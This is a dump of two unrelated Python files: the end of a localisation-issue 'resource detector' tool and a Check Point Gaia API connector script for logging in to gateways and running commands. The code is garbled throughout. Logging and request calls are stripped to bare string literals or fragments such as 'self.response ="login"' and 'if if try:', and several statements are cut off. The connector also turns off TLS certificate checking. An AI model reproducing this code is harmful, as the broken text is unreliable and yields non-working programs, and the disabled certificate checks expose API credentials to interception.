is not the same as {encoding} encoding detected by BOM".format(path = self.path, encoding = encoding)) return None try: return bin_data.decode("utf_8") except UnicodeDecodeError: pass try: return bin_data.decode("cp1252") except UnicodeDecodeError: pass try: return bin_data.decode(locale.getpreferredencoding()) except UnicodeDecodeError: LOG.error("Cannot read file '{path}', encoding is unknown".format(path = self.path)) return None def get_line_number(self, location): return self.code.count("\n", 0, location) + 1 def get_column_number(self, location): try: if self.code[location] == "\n": return 1 else: return location - self.code.rfind("\n", 0, location) except IndexError: return 0 def get_column_number_with_offset(self, location): try: if self.code[location] == "\n": return 1, 0 else: column_start = self.code.rfind("\n", 0, location) return location - column_start, self.code.count("\t", column_start + 1, location) * (TAB_WIDTH - 1) except IndexError: return 0, 0 def get_code_snippet(self, start, end): return self.code[start:end] def get_line(self, location): last_new_line = self.code.rfind("\n", 0, location) next_new_line = self.code.find("\n", location) if next_new_line >= 0: return self.code[(last_new_line + 1):next_new_line] else: return self.code[(last_new_line + 1):] def get_resource_keys(self): if not self.code: return None target = None if self.extension == "js": #resource_key = (((PY.Literal("Locale") + PY.Optional(PY.Word(PY.alphas))) | PY.Literal("html")) + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress() resource_key = ((PY.CaselessLiteral("locale") + PY.Optional(PY.Word(PY.alphanums + "_")) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal("."))) | (PY.Literal("html") + PY.Literal("."))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress() #resource_key = ((PY.Literal("getLocalizationData()") + PY.Literal(".") + PY.Word(PY.alphas)) | (PY.Word(PY.alphas) + PY.Literal(".") + PY.Optional(PY.Word(PY.alphas) + PY.Literal(".")))).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + PY.NotAny(PY.Word(PY.alphanums + "_")).suppress() comment = PY.cppStyleComment string_parser = PY.quotedString target = resource_key.ignore(comment | string_parser).parseWithTabs() elif self.extension == "htm" or self.extension == "html": resource_key = (PY.Literal("{") *(2, 3)).suppress() + (PY.Literal("Locale.") | PY.Literal("html.") | PY.Literal("locale.html.")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) + (PY.Literal("}") *(2, 3)).suppress() #resource_key = (PY.Word(PY.alphanums + "_") + PY.Literal(".")).suppress() + (PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_") + PY.ZeroOrMore(PY.Literal("_") + PY.Word(string.ascii_uppercase, string.ascii_uppercase + PY.nums + "_"))).setParseAction(lambda t: "".join(t)) comment = PY.htmlComment target = resource_key.ignore(comment).parseWithTabs() else: pass #target = PY.NoMatch for tokens, start, end in target.scanString(self.code): yield tokens[0], start, end class Configuration: def __init__(self, dir_input): self.config_module_dir = dir_input self.config_file_name = "" self.config_module_name = "resource_detector_config" self.config_file_path = os.path.join(self.config_module_dir, self.config_file_name) self.config_module = self.get_config_module() self.use_user_config = True if self.config_module else False self.support_res_exts = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"] self.support_res_types = ["resx", "resw", "rc", "rc2", "mc", "wxl", "strings", "xml", "js", "properties", "po", "tok", "xib", "json"] self.detector_switch_attrs = \ { "resx" : "USE_RESX_DETECTOR", "resw" : "USE_RESW_DETECTOR", "rc" : "USE_RC_DETECTOR", "rc2" : "USE_RC2_DETECTOR", "mc" : "USE_MC_DETECTOR", "wxl" : "USE_WXL_DETECTOR", "strings" : "USE_STR_DETECTOR", "xml" : "USE_XML_DETECTOR", "js" : "USE_JS_DETECTOR", "properties" : "USE_PRO_DETECTOR", "po" : "USE_PO_DETECTOR", "tok" : "USE_TOK_DETECTOR", "xib" : "USE_XIB_DETECTOR", "json" : "USE_JSON_DETECTOR", } self.detect_issues_attrs = \ { "resx" : "RESX_DETECT_ISSUES", "resw" : "RESW_DETECT_ISSUES", "rc" : "RC_DETECT_ISSUES", "rc2" : "RC2_DETECT_ISSUES", "mc" : "MC_DETECT_ISSUES", "wxl" : "WXL_DETECT_ISSUES", "strings" : "STR_DETECT_ISSUES", "xml" : "XML_DETECT_ISSUES", "js" : "JS_DETECT_ISSUES", "properties" : "PRO_DETECT_ISSUES", "po" : "PO_DETECT_ISSUES", "tok" : "TOK_DETECT_ISSUES", "xib" : "XIB_DETECT_ISSUES", "json" : "JSON_DETECT_ISSUES", } self.fixed_res_groups_attrs = \ { "resx" : "USE_FIXED_RESX_RES_FILE_GROUPS", "resw" : "USE_FIXED_RESW_RES_FILE_GROUPS", "rc" : "USE_FIXED_RC_RES_FILE_GROUPS", "rc2" : "USE_FIXED_RC2_RES_FILE_GROUPS", "mc" : "USE_FIXED_MC_RES_FILE_GROUPS", "wxl" : "USE_FIXED_WXL_RES_FILE_GROUPS", "strings" : "USE_FIXED_STR_RES_FILE_GROUPS", "xml" : "USE_FIXED_XML_RES_FILE_GROUPS", "js" : "USE_FIXED_JS_RES_FILE_GROUPS", "properties" : "USE_FIXED_PRO_RES_FILE_GROUPS", "po" : "USE_FIXED_PO_RES_FILE_GROUPS", "tok" : "USE_FIXED_TOK_RES_FILE_GROUPS", "xib" : "USE_FIXED_XIB_RES_FILE_GROUPS", "json" : "USE_FIXED_JSON_RES_FILE_GROUPS", } self.res_groups_attrs = \ { "resx" : "RESX_RES_FILE_GROUPS", "resw" : "RESW_RES_FILE_GROUPS", "rc" : "RC_RES_FILE_GROUPS", "rc2" : "RC2_RES_FILE_GROUPS", "mc" : "MC_RES_FILE_GROUPS", "wxl" : "WXL_RES_FILE_GROUPS", "strings" : "STR_RES_FILE_GROUPS", "xml" : "XML_RES_FILE_GROUPS", "js" : "JS_RES_FILE_GROUPS", "properties" : "PRO_RES_FILE_GROUPS", "po" : "PO_RES_FILE_GROUPS", "tok" : "TOK_RES_FILE_GROUPS", "xib" : "XIB_RES_FILE_GROUPS", "json" : "JSON_RES_FILE_GROUPS", } self.detect_languages_attrs = \ { "resx" : "RESX_DETECT_LANGUAGES", "resw" : "RESW_DETECT_LANGUAGES", "rc" : "RC_DETECT_LANGUAGES", "rc2" : "RC2_DETECT_LANGUAGES", "mc" : "MC_DETECT_LANGUAGES", "wxl" : "WXL_DETECT_LANGUAGES", "strings" : "STR_DETECT_LANGUAGES", "xml" : "XML_DETECT_LANGUAGES", "js" : "JS_DETECT_LANGUAGES", "properties" : "PRO_DETECT_LANGUAGES", "po" : "PO_DETECT_LANGUAGES", "tok" : "TOK_DETECT_LANGUAGES", "xib" : "XIB_DETECT_LANGUAGES", "json" : "JSON_DETECT_LANGUAGES", } self.detector_classes = \ { "resx" : ResxResDetector, "resw" : ReswResDetector, "rc" : RcResDetector, "rc2" : Rc2ResDetector, "mc" : McResDetector, "wxl" : WxlResDetector, "strings" : StrResDetector, "xml" : XmlResDetector, "js" : JsResDetector, "properties" : ProResDetector, "po" : PoResDetector, "tok" : TokResDetector, "xib" : XibResDetector, "json" : JsonResDetector, } self.res_file_classes = \ { "resx" : ResxResFile, "resw" : ReswResFile, "rc" : RcResFile, "rc2" : Rc2ResFile, "mc" : McResFile, "wxl" : WxlResFile, "strings" : StrResFile, "xml" : XmlResFile, "js" : JsResFile, "properties" : ProResFile, "po" : PoResFile, "tok" : TokResFile, "xib" : XibResFile, "json" : JsonResFile, } self.default_detect_issues = {issue_name.value for issue_name in IssueName if issue_name != IssueName.untranslated_value} self.ignore_issues_attr = "IGNORE_ISSUES" def get_config_module(self): if not os.path.isfile(self.config_file_path): return None if not self.config_module_dir in sys.path: sys.path.insert(0, self.config_module_dir) if not self.config_module_name in sys.modules: try: config = importlib.__import__(self.config_module_name) del sys.path[0] return config except ImportError as ie: del sys.path[0] LOG.critical("Cannot import configuration file: {import_error}".format(import_error = ie)) quit_application(-1) except Exception as e: del sys.path[0] LOG.critical("Cannot import configuration file: {exception}".format(exception = e)) quit_application(-1) class ResourceDetector: def __init__(self, arguments): self.args = arguments self.src_dir = self.get_absolute_path( self.res_files = {} self.res_file_count = 0 self.issues = Issues() self.begin_time = datetime.utcnow() self.end_time = datetime.utcnow() self.file_count = 0 self.item_count = 0 self.config = Configuration(self.src_dir) def get_absolute_path(self, dir_input): scan_dir = os.path.abspath(dir_input) if not os.path.isdir(scan_dir): LOG.critical("The input scan directory '{directory}' is not valid, please have a check".format(directory = scan_dir)) quit_application(-1) return scan_dir def run(self): if self.args.generate_config: self.write_configuration() else: self.detect() self.filter_issues() self.end_time = datetime.utcnow() self.display_summary_result() self.write_result_for_user() self.write_result_for_ignoring() self.write_result_for_platform() def get_resource_files(self):"Filtering resource files in '{directory}'...".format(directory = self.src_dir)) for res_type in self.config.support_res_types: self.res_files[res_type] = [] res_file_count = 0 for root, dirs, files in os.walk(self.src_dir): for file in files: self.file_count += 1 for ext in self.config.support_res_exts: if file.endswith("." + ext): if ext == "xml": if "values" in os.path.basename(root): self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext)) else: continue elif ext == "js": if os.path.dirname(root).endswith("nls"): self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext)) else: continue elif ext == "json": if ("locales" == os.path.basename(root)) or ("_locales" in root.lower().split(os.sep)): self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext)) else: continue else: self.res_files[ext].append(self.config.res_file_classes[ext](root, file, ext)) res_file_count += 1"Filtered {0} resource files from {1} files".format(res_file_count, self.file_count)) def detect(self):"Start running {application} to scan '{src_dir}'".format(application = __application__, src_dir = self.src_dir)) if self.config.use_user_config: self.get_resource_files()"Configuration file '{config_file}' exists, start detecting with this configuration file".format(config_file = self.config.config_file_path))"---------------------------------------------------------------------------------------------------------------------------------------") for res_type in self.config.support_res_types: res_files = self.res_files.get(res_type) if not res_files: continue try: detector_switch = getattr(self.config.config_module, self.config.detector_switch_attrs[res_type]) if detector_switch == True: try:"Start running {res_type} {application} with configuration".format(res_type = res_type, application = __application__)) res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type) res_detector.detect() self.issues.extend(res_detector.issues) self.item_count += res_detector.item_count self.res_file_count += res_detector.res_file_count"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))"---------------------------------------------------------------------------------------------------------------------------------------") quit_application(-1) except AttributeError: pass else: self.get_resource_files()"---------------------------------------------------------------------------------------------------------------------------------------") for res_type in self.config.support_res_types: res_files = self.res_files.get(res_type) if res_files: try:"Start running {res_type} {application}".format(res_type = res_type, application = __application__)) res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type) res_detector.detect() self.issues.extend(res_detector.issues) self.item_count += res_detector.item_count self.res_file_count += res_detector.res_file_count"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when running {res_type} {application}: {exception}".format(res_type = res_type, application = __application__, exception = e))"---------------------------------------------------------------------------------------------------------------------------------------") quit_application(-1) def write_configuration(self):"Start generating a new configuration file: '{config_file}'".format(config_file = self.config.config_file_path)) try: output_file = open(file = self.config.config_file_path, mode = "w", encoding = "utf_8_sig") except Exception as e: LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e)) quit_application(-1) self.get_resource_files()"---------------------------------------------------------------------------------------------------------------------------------------") try: output_file.write("# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n") output_file.write("# configuration file generated time(utc): {time_now}\n\n\n".format(time_now = datetime.utcnow())) output_file.close() except Exception as e: LOG.critical("An error occurred when writing configuration to '{config_file}': {exception}".format(config_file = self.config.config_file_path, exception = e)) quit_application(-1) for res_type in self.config.support_res_types: res_files = self.res_files.get(res_type) if res_files: try:"Start writing configuration related to {res_type} files".format(res_type = res_type)) res_detector = self.config.detector_classes[res_type](self.src_dir, res_files, self.config, res_type) res_detector.write_configuration()"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when writing configuration related to {ext} files: {exception}".format(ext = res_type, exception = e))"---------------------------------------------------------------------------------------------------------------------------------------") quit_application(-1) try: output_file = open(file = self.config.config_file_path, mode = "a", encoding = "utf_8_sig") output_file.write("#Copy the issues you want to ignore from detection result to the set, each issue item should be like the example below: R'''issue''',\n") output_file.write("#You can also use -i option to generate the ignore issue patterns which can be directly copied and used here\n") output_file.write("{ignore_issues_attr} =\\\n".format(ignore_issues_attr = self.config.ignore_issues_attr) + "{\n") output_file.write("#R'''{issue_string}''',\n".format(issue_string = R"D:\Code\TestCode\StudioArthur\Installers\Console\LocalizedResources\zh-cn.wxl, 0, 0, unmatched placeholder(s) in localized resource file, error, key=WelcomeEulaDlg_Title, value=[ProductName] 安装程序")) output_file.write("}") output_file.close() except Exception as e: LOG.critical("Cannot open '{config_file}' to write configuration content: {exception}".format(config_file = self.config.config_file_path, exception = e)) quit_application(-1)"Configuration file '{config_file}' has been generated, customize it and run {application} again".format(config_file = self.config.config_file_path, application = __application__)) def filter_issues(self): if not self.config.use_user_config: return ignore_issues = getattr(self.config.config_module, self.config.ignore_issues_attr, set()) if not ignore_issues: return"Filtering detected issues...")"---------------------------------------------------------------------------------------------------------------------------------------") remaining_issues = Issues() for issue in self.issues.get_issues(): issue_for_user = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip()) if not issue_for_user in ignore_issues: remaining_issues.add(issue) else: ignore_issues.remove(issue_for_user) self.issues = remaining_issues def display_summary_result(self):"Detection result summary:")"Start time: {start_time}".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone()))"End time: {end_time}".format(end_time = self.end_time.replace(tzinfo = timezone.utc).astimezone()))"Time cost(hh:mm:ss): {duration}".format(duration = self.end_time - self.begin_time))"File(s) scanned: {file_count}".format(file_count = self.res_file_count))"Item(s) scanned: {item_count}".format(item_count = self.item_count))"Issue(s) detected: {issue_count}".format(issue_count = self.issues.issue_count))"Error(s) detected: {error_count}".format(error_count = self.issues.error_count))"Warning(s) detected: {warning_count}".format(warning_count = self.issues.warning_count))"---------------------------------------------------------------------------------------------------------------------------------------") def write_result_for_platform(self): try: if self.args.summary:"Writing summary detection result for platform...") summary_file = self.args.summary if not summary_file.endswith(".csv"): summary_file = summary_file + ".csv" with open(summary_file, "w", encoding = "utf_8_sig", newline = "") as fw: summary_writer = csv.writer(fw) summary_writer.writerow(["files", "errors", "warnings", "items", "begin", "end", "name", "version"]) summary_writer.writerow([self.res_file_count, self.issues.error_count, self.issues.warning_count, self.item_count, self.begin_time, self.end_time, __application__, __version__])"---------------------------------------------------------------------------------------------------------------------------------------") if self.args.details:"Writing detailed detection result for platform...") details_file = self.args.details if not details_file.endswith(".csv"): details_file = details_file + ".csv" with open(details_file, "w", encoding = "utf_8_sig", newline = "") as fw: details_writer = csv.writer(fw) details_writer.writerow(["file", "line", "column", "columnEnd", "severity", "code", "context"]) for issue in self.issues.get_issues(): details_writer.writerow([os.path.relpath(issue.file, self.src_dir).replace("\\", "/"), issue.line, issue.column_begin, issue.column_end, issue.severity.value, issue.code.value, issue.context])"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when writing detection result for platform: {exception}".format(exception = e)) quit_application(-1) def write_result_for_user(self): if self.args.output: try:"Writing detection result...") output_file = open(file = self.args.output, mode = "w", encoding = "utf_8_sig") output_file.write("Detection result summary:\n") output_file.write("Tool name: {tool_name}\n".format(tool_name = __application__)) output_file.write("Tool version: {tool_version}\n".format(tool_version = __version__)) output_file.write("Source directory: {src_dir}\n".format(src_dir = self.src_dir)) output_file.write("Start time: {start_time}\n".format(start_time = self.begin_time.replace(tzinfo = timezone.utc).astimezone())) output_file.write("End time: {end_time}\n".format(end_time = self.end_time.replace(tzinfo=timezone.utc).astimezone())) output_file.write("Time cost(hh:mm:ss): {duration}\n".format(duration = self.end_time - self.begin_time)) output_file.write("File(s) scanned: {file_count}\n".format(file_count = self.res_file_count)) output_file.write("Item(s) scanned: {item_count}\n".format(item_count = self.item_count)) output_file.write("Issue(s) detected: {issue_count}\n".format(issue_count = self.issues.issue_count)) output_file.write("Error(s) detected: {error_count}\n".format(error_count = self.issues.error_count)) output_file.write("Warning(s) detected: {warning_count}\n".format(warning_count = self.issues.warning_count)) output_file.write("---------------------------------------------------------------------------------------------------------------------------------------------------------\n") output_file.write("File, Line, Column, Issue, Severity, Context\n") for issue in self.issues.get_issues(): output_file.write("{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}\n".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip())) output_file.close()"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when writing detection result to '{output_file}': {exception}".format(output_file = self.args.output, exception = e)) quit_application(-1) def write_result_for_ignoring(self): if self.args.ignore_pattern: try:"Writing ignore issue patterns...") output_file = open(file = self.args.ignore_pattern, mode = "w", encoding = "utf_8_sig") for issue in self.issues.get_issues(): issue_pattern = "{file}, {line_begin}, {column_begin}, {description}, {severity}, {context}".format(file = issue.file, line_begin = issue.line, column_begin = issue.column_begin + issue.column_begin_offset, description = issue.description.value, severity = issue.severity.value, context = issue.context.replace("\u2308", "").replace("\u2309", "").strip()) output_file.write(repr(issue_pattern) + ",\n") output_file.close()"---------------------------------------------------------------------------------------------------------------------------------------") except Exception as e: LOG.critical("An error occurred when writing ignore issue patterns to '{output_file}': {exception}".format(output_file = self.args.ignore_pattern, exception = e)) quit_application(-1) def initialize(arguments): try: global LOG LOG = logging.getLogger(__name__) LOG.setLevel(logging.INFO) formatter = logging.Formatter("[%(levelname)s]: %(message)s") if arguments.log: file_handler = logging.FileHandler(filename = arguments.log, mode = 'w', encoding = "utf_8_sig", delay = False) file_handler.setFormatter(formatter) LOG.addHandler(file_handler) stream_handler = logging.StreamHandler(stream = sys.stdout) stream_handler.setFormatter(formatter) LOG.addHandler(stream_handler) except Exception as e: print("[CRITICAL]: An error occurred when initializing logging: {exception}".format(exception = e)) print("[INFO]: {application} exited abnormally".format(application = __application__)) sys.exit(-1) if if try: global TAB_WIDTH TAB_WIDTH = int( except ValueError: LOG.critical("Argument 'tab' is not valid, please have a check") quit_application(-1) else: LOG.critical("Argument 'tab' is not valid, please have a check") quit_application(-1) def quit_application(state): if state == -1:"{application} exited abnormally".format(application = __application__)) else:"{application} exited normally".format(application = __application__)) sys.exit(state) def parse_arguments(arguments): arg_parser = argparse.ArgumentParser(description = "resource detector: detect g11n/i18n issues in resource files") arg_parser.add_argument("directory", help = "specify the source code directory to be scanned") arg_parser.add_argument("-o", "--output", metavar = "result.txt", help = "specify the output file where detection result will be written") arg_parser.add_argument("-g", "--generate_config", action = "store_true", help = "generate configuration file named '' in the directory to be scanned") arg_parser.add_argument("-l", "--log", metavar = "log.txt", help = "specify the log file") arg_parser.add_argument("-t", "--tab", metavar = "4", help = "specify the tab width to make sure the column number is correctly calculated, default value is 4") arg_parser.add_argument("-i", "--ignore_pattern", metavar = "ignore_patterns.txt", help = "specify the file where ignore issue patterns will be written") arg_parser.add_argument("-s", "--summary", metavar = "summary.csv", help = "specify the csv file where summary detection result will be written") arg_parser.add_argument("-d", "--details", metavar = "details.csv", help = "specify the csv file where detailed detection result will be written") arg_parser.add_argument("-v", "--version", action = "version", version = __version__) return arg_parser.parse_args(arguments) def main(argv): arguments = parse_arguments(argv[1:]) initialize(arguments) resource_detector = ResourceDetector(arguments) return 0 if __name__ == "__main__": result = main(sys.argv) quit_application(result) ```
{ "source": "0dadj1an/Check_Point_Gaia_API_config_generator", "score": 2 }
#### File: 0dadj1an/Check_Point_Gaia_API_config_generator/ ```python __author__ = "<NAME>" __credits__ = ["ivosh", "laura"] __version__ = "1.0" __maintainer__ = "<NAME>" __email__ = "<EMAIL>" __status__ = "production" __dev_version__ = "v1" __spec__= "GaiaAPI connector" import requests import urllib3 import json import sys import time import getpass import logging import os import base64 import ipaddress import signal import argparse from datetime import datetime ######## Class############ class DoLogging(): """ Logging class, to have some possibility debug code in the future """ def __init__(self) -> None: """ Constructor does not do anything """ pass def do_logging(self:object, msg:str) -> None: """ Log appropriate message into log file """ # if needed change to DEBUG for more data current_path=(os.path.dirname(os.path.abspath(__file__))) log='{0}/gaia_api_connector.elg'.format(current_path) logging.basicConfig(filename=log, level=logging.DEBUG) msgq = 'TIME:{}:{}'.format(str(,msg) requests_log = logging.getLogger("requests.packages.urllib3") requests_log.setLevel(logging.DEBUG) requests_log.propagate = True ######## Class############ class Connector(): """ Connector class is main class handling connectivity to CP API """ # do not care about ssl cert validation for now urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) @classmethod def task_method(cls, sid:str, url:str, task:str) -> dict: """ this is help method which is checking task status when publish is needed """ payload_list={} payload_list['task-id']=task headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': sid, } response ="show-task", json=payload_list, headers=headers, verify=False) return response def __init__(self, url:str, payload:dict) -> dict: """ This is constructor for class, login to API server is handled here - handling also conectivity problems to API """ self.sid="" # default header without SID self.headers_default = { 'content-type': "application/json", 'Accept': "*/*", } # headers for usage in instance methods - with self.SID - will be filled up in constructor self.headers = {} self.url=url self.payload_list = payload # default only username and passowrd done=False counter=0 # loop to handle connection interuption while not done: counter +=1 if counter == 5: DoLogging().do_logging ('Connector() - init() - connection to API can not be established even in loop, check your credentials or IP connectivity') sys.exit(1) try: self.response ="login", json=self.payload_list, headers=self.headers_default, verify=False) DoLogging().do_logging('Connector() - init() - login OK: {}'.format(self.url)) DoLogging().do_logging('Connector() - init() - login data: {}'.format(self.response.text)) if self.response.status_code == 200: #print(json.loads(self.response.text)) try: sid_out=json.loads(self.response.text) self.sid = sid_out['sid'] self.headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': self.sid, } DoLogging().do_logging('Connector() - init() - Connection to API is okay') except Exception as e: DoLogging().do_logging(' Connector() - init() - API is not running probably: {}..'.format(e)) else: a = json.loads(self.response.text) DoLogging().do_logging("Connector() - init() - Exception occured: {}".format(a)) DoLogging().do_logging('Connector() - init() - There is no SID, connection problem to API gateway, trying again..') time.sleep (1) continue except Exception as e: DoLogging().do_logging(' Connector() - init() - exception occured..can not connect to mgmt server, check IP connectivity or ssl certificates!!! : {}'.format(e)) else: done=True def logout(self) -> None: """ Logout method for correct disconenction from API """ done=False counter=0 while not done: counter +=1 if counter == 5: DoLogging().do_logging('Connector() - logout() - logout can not be done because connection to mgmt is lost and reconnect does not work...') sys.exit(1) else: try: payload_list={} self.response ="logout", json=payload_list, headers=self.headers, verify=False) if self.response.status_code == 200: DoLogging().do_logging ('Connector() - logout() - logout from API is okay') return self.response.json() else: out = json.loads(self.response.text) DoLogging().do_logging (" ") DoLogging().do_logging(out) DoLogging().do_logging (" ") return self.response.json() except Exception as e: DoLogging().do_logging ('Connector() - logout() - connection to gateway is broken, trying again: {}'.format(e)) @staticmethod def base64_ascii(base64resp:str) -> str: """Converts base64 to ascii for run command/showtask.""" try: return base64.b64decode(base64resp).decode('utf-8') except Exception as e: DoLogging().do_logging("base64 error:{}".format(e)) def run_script(self, payload:dict) -> str: """ run script method is responsible for running script on target (ls -la, df -lh etc. basic linux commands) """ payload_list=payload headers = { 'content-type': "application/json", 'Accept': "*/*", 'x-chkp-sid': self.sid, } return_string = '' done=False counter=0 while not done: counter +=1 if counter == 5: DoLogging().do_logging('Connector() - run_script() - discard can not be done because connection to mgmt is lost and reconnect does not work...') sys.exit(1) else: try: self.response ="run-script", json=payload_list, headers=headers, verify=False) task=json.loads(self.response.text) while True: show_task=Connector.task_method(self.sid,self.url,task['task-id']) show_task_text=json.loads(show_task.text) #DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text)) time.sleep (5) if show_task_text['tasks'][0]['progress-percentage'] == 100: base64resp = (str(self.send_cmd('show-task', payload={"task-id":show_task_text['tasks'][0]['task-id']})['tasks'][0]['task-details'][0]['output'])) asciiresp = self.base64_ascii(base64resp) return_string=return_string+"\n\n"+"Data for target:"+"\n"+asciiresp+"\n\n\n\n\n\n" #DoLogging().do_logging ("Connector() - run_script() - :{}".format(show_task_text)) break else: continue return return_string except Exception as e: DoLogging().do_logging ("Connector() - run_script() - Exception in run_script method, some data not returned, continue: {} {}".format(e, tasks)) else: done=True def send_cmd(self, cmd:str, payload:dict) -> dict: """ Core method, all data are exchanged via this method via cmd variable, you can show, add data etc. """ done=False counter=0 while not done: counter +=1 if counter == 5: DoLogging().do_logging ("Connector() - send_cmd() - Can not send API cmd in loop, there are some problems, changes are unpublished, check it manually..") self.logout() sys.exit(1) else: try: payload_list=payload self.response = + cmd, json=payload_list, headers=self.headers, verify=False) if self.response.status_code == 200: #uncomment for TSHOOT purposes DoLogging().do_logging ('Connector() - send_cmd() - send cmd is okay') #out = json.loads(self.response.text) #DoLogging().do_logging ('Connector() - send_cmd() - send cmd response is 200 :{}'.format(out)) return self.response.json() else: out = json.loads(self.response.text) DoLogging().do_logging(" Connector() - send_cmd() - response code is not 200 :{}".format(out)) return self.response.json() except Exception as e: DoLogging().do_logging ("Connector() - send_cmd() - POST operation to API is broken due connectivity flap or issue.. trying again..: {}".format(e)) ######## Class############ class Interactive_Init_Handler(): """ Init class for getting basic data about user/pwd/GW IP and establishing connector for API """ def __init__(self) -> None: self.user='' self.password='' self.IP='' self.node1IP='' self.node2IP='' self.connector=None self.connectors=[] self.version='' = None self.path='' @staticmethod def validate_ip(ip:str) -> bool: """ validate ip format to avoid adding crazy data for IP based variable """ check = True try: data = ip.split(":") ip = ipaddress.ip_address(data[0]) return check except Exception as e: check= False print ("IP validation failed for some reason!: {}".format(e)) return check def _single(self, singleIP=None)-> None: """ establishing single connector to appropriate gateways via special class Connector() object depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not """ try: if singleIP == None: self.IP=input("Enter GW IP: ") else: self.IP = singleIP if not self.user or not self.password or not self.IP: print ("Empty username or password or server IP, finish..") sys.exit(1) else: if self.validate_ip(self.IP): payload ={ "user":self.user, "password":<PASSWORD> } try: connector = Connector('https://{}/gaia_api/'.format(self.IP), payload) self.connector = connector except Exception as e: print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e)) else: print ("Wrong IP for single GW, exit") raise Exception ("Wrong IP for single GW, exit") except Exception as e: raise Exception ("Error in Interactive_Init_Handler()._single() method") print ("Connector to single gw is established") def _cluster (self, nodeIP1=None, nodeIP2=None) -> None: """ establishing cluster connectors to appropriate gateways via special class Connector() object depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not """ try: if nodeIP1 == None and nodeIP2 == None: self.node1IP=input("Enter node1 IP: ") self.node2IP=input("Enter node2 IP: ") else: self.node1IP = nodeIP1 self.node2IP = nodeIP2 if not self.user or not self.password or not self.node1IP or not self.node2IP: print ("Empty username or password or server IP, finish..") sys.exit(1) else: if self.validate_ip(self.node1IP): payload ={ "user":self.user, "password":<PASSWORD> } try: connector = Connector('https://{}/gaia_api/'.format(self.node1IP), payload) self.connectors.append(connector) except Exception as e: print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e)) if self.validate_ip(self.node2IP): payload ={ "user":self.user, "password":self.password } try: connector = Connector('https://{}/gaia_api/'.format(self.node2IP), payload) self.connectors.append(connector) except Exception as e: print ("Can not establish connector, check logcp_gaia_api.elg : {}".format(e)) else: print ("Wrong IP for single GW, exit") raise Exception ("Wrong IP for single GW, exit") except Exception as e: raise Exception ("Error in Interactive_Init_Handler()._cluster() method") print ("Connectors to cluster established") def _load_data(self, path=None)-> dict: """ load json data via separate object via class Load_Data() depends on the call from Interactive_Init_Handler().run() it is asking for path to json or not """ try: if path == None: # interactive mode path=input("Where is your json file with data for vlan manipulation?\n If no path specified, I count file data.json is in same folder as script\n") if not path: data = Load_Data() return data.load_data() else: data = Load_Data(path) return data.load_data() else: # mode with args data = Load_Data(path) return data.load_data() except Exception as e: raise Exception def run(self) -> None: """ handle user input at the beginning // handle argparse parameters - depends on the format """ try: argParser = argparse.ArgumentParser(description='_Script for Gaia API modification_') argParser.add_argument("-s", dest="single", help=('specify single GW IP'), required=False) argParser.add_argument("-jh", dest="jh", help=('display json format help'), required=False) argParser.add_argument("-n1", dest="node1", help=('spiecify cluster node1 IP'), required=False) argParser.add_argument("-n2", dest="node2", help=('spiecify cluster node2 IP'), required=False) argParser.add_argument("-u", dest="user", help=('spiecify user name'), required=False) #argParser.add_argument("-p", dest="password", help=('spiecify password'), required=False) argParser.add_argument("-v", dest="version", help=('spiecify version to run [cluster/single]'), required=False) argParser.add_argument("-d", dest="path", help=('spiecify path to json data, default is the same directory'), required=False) args = argParser.parse_args() if args.jh == "TRUE": print (Error_Msg().display()) sys.exit(1) # check if args are 